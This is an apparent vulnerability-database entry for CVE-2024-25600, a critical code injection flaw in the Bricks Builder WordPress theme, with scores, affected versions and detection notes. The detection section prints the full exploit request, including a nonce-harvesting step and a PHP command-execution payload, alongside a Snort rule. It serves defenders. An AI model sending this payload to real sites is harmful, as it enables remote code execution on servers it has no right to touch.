cbcvebase.
CVE-2024-25600
published 2024-06-04

CVE-2024-25600: Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks…

PriorityP195critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
87.45%
99.7th percentile
Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks Builder: from n/a through 1.9.6.

Affected

1 ranges
VendorProductVersion rangeFixed in
codeer_limitedbricks_buildern/a – 1.9.6

Detection & IOCsextracted from sources · hover to see the quote

url/wp-json/bricks/v1/render_element
path/wp-content/themes/bricks/
commandob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2024-25600 Bricks Exploitation Attempt"; flow:established,to_server; http.request_line; content:"POST|20 2f|wp|2d|json|2f|bricks|2f|v1|2f|render|5f|element|20|"; fast_pattern; http.request_body; content:"postId"; content:"nonce"; content:"useQueryEditor"; content:"queryEditor"; reference:url,github.com/Chocapikk/CVE-2024-25600/; reference:cve,2024-25600; classtype:misc-attack; sid:2051020; rev:2; metadata:affected_product Wordpress_Plugins, attack_target Client_Endpoint, tls_state TLSEncrypt, created_at 2024_02_21, cve CVE_2024_25600, deployment Perimeter, deployment SSLDecrypt, confidence Medium, signature_severity Major, tag Wordpress, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_02_22, reviewed_at 2024_11_06;)
yara
id: CVE-2024-25600
http:
- raw:
  - |
    GET / HTTP/1.1
    Host: {{Hostname}}
  - |
    POST /wp-json/bricks/v1/render_element HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/json
    {"postId": "1","nonce": "{{nonce}}","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);","objectType": "post"}}}}
matchers:
- type: regex
  regex:
  - "Exception:"
  - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
  • The exploit requires a two-step process: first retrieve the nonce from the homepage JSON block (var bricksData), then POST to /wp-json/bricks/v1/render_element with the nonce and a malicious queryEditor payload.
  • The exploit payload is delivered as a JSON POST body containing the fields: postId, nonce, element.name, element.settings.hasLoop, element.settings.query.useQueryEditor, and element.settings.query.queryEditor. Detection should look for all four body keywords together.
  • Post-exploitation activity includes disabling security plugins such as Wordfence and Sucuri — monitor for unexpected deactivation of these plugins after exploitation.
  • The Nuclei template extracts the nonce via regex 'nonce":"([0-9a-z]+)' from the homepage body — use this pattern to identify nonce-harvesting reconnaissance requests in web logs.
  • ·The Snort/ET rule requires TLS decryption (SSLDecrypt deployment) to inspect the POST body, as the exploit typically occurs over HTTPS.

CVSS provenance

nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.